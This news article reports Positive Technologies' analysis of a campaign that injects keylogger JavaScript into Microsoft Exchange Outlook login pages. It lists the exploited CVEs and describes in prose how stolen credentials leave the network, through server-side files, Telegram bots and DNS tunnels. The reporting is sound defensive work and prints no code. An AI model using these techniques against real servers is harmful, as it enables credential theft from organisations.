Unidentified threat actors now actively target publicly exposed Microsoft Exchange servers by injecting Malicious code into login pages that harvest credentials.
In a new analysis published last week, Positive Technologies revealed that it identified two types of Keylogger code, both written in JavaScript, embedded into the Outlook login page:
- One variant saves the collected data to a local file, which attackers can access via the internet.
- The other immediately transmits the harvested data to an external server.
Furthermore, the Russian cybersecurity vendor confirmed that these attacks have already affected 65 victims across 26 countries. This activity continues a broader campaign first observed in May 2024, which initially targeted entities in Africa and the Middle East.
At that time, the company had already discovered at least 30 victims, including government agencies, banks, IT companies, and educational institutions. The evidence suggests that the first compromise occurred as early as 2021.
The attack chain typically begins by exploiting known Microsoft Exchange Server Vulnerabilities (e.g., ProxyShell), allowing attackers to insert keylogger code into the login page. So far, researchers have not yet identified the individuals or groups behind the operation.
The attackers have weaponized several specific Vulnerabilities, including:
- CVE-2014-4078 – IIS Security Feature Bypass Vulnerability
- CVE-2020-0796 – Windows SMBv3 Client/Server Remote Code Execution Vulnerability
- CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 – Microsoft Exchange Server Remote Code Execution Vulnerabilities (ProxyLogon)
- CVE-2021-31206 – Microsoft Exchange Server Remote Code Execution Vulnerability
- CVE-2021-31207, CVE-2021-34473, CVE-2021-34523 – Microsoft Exchange Server Security Feature Bypass Vulnerabilities (ProxyShell)
Security researchers Klimentiy Galkin and Maxim Suslov explained that the malicious JavaScript reads and processes data from the authentication form. It then transmits the data using an XHR request to a specific page on the compromised Exchange server.
This target page includes a handler function that processes incoming requests and writes the captured Credentials to a file on the server.
Since this file remains accessible from an external network, attackers can retrieve the data remotely. Notably, certain variants of the keylogger also capture user cookies, User-Agent strings, and Timestamps.
This method offers a key advantage: because it doesn’t produce outbound traffic, it greatly reduces the likelihood of Detection.
Meanwhile, a second variant uncovered by Positive Technologies relies on a Telegram bot for exfiltration. It sends the stolen credentials through XHR GET requests, with the encoded login and password values included in the APIKey and AuthToken headers.
Additionally, another tactic uses a DNS tunnel combined with an HTTPS POST request to exfiltrate credentials while bypassing organizational defenses.
Out of all the infected systems, 22 belong to government organizations. The rest span IT, industrial, and Logistics sectors. The top 10 affected countries include Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, the Netherlands, and Turkey.
Positive Technologies emphasized that many Microsoft Exchange servers exposed to the internet remain vulnerable to older, well-documented flaws. By embedding malicious code into legitimate authentication pages, attackers can maintain long-term access while stealthily capturing user Credentials in plaintext.
Source: TheHackerNews
Read more at Impreza News